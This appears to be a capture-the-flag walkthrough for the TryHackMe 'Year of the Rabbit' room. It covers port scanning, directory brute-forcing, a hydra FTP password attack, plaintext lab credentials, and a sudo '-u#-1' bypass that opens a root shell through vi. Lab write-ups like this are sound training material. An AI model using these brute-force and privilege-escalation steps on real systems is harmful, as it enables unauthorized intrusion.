Year of the Rabbit
Room Link: https://tryhackme.com/room/yearoftherabbit
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt



Turn off Javascript
Enter about:config into the search bar and select Accept the Risk and Continue.
Enter javascript.enabled into the search box at the top of the page.
Select the javascript.enabled toggle to change the value to false.




Kali
strings Hot_Babe.png

Kali
hydra -l ftpuser -P passwords.txt ftp://$VICTIM

FTP
Kali
ftp $VICTIM
password: 5iez1wGXKfPKQ


Elis creds is encoded with something called Brain fuck. There are tools online to decode it.
Link: https://www.dcode.fr/brainfuck-language

Kali
ssh eli@$VICTIM
Password: DSpDiM1wAEwid

Victim
locate s3cr3t
cat cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!


Victim
su gwendoline
Password: MniVCQVhQHUNI

Privilege escalation
Mostly followed the link below, we can't run sudo with root as we have (ALL , !root) here. if we had (ALL , ALL) it would be easy to escalate. Adding sudo -u#-1 to infront of the command allows us to bypass this.
Link: https://www.exploit-db.com/exploits/47502
Victim
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
#While vi is open run:
:!/bin/sh

Last updated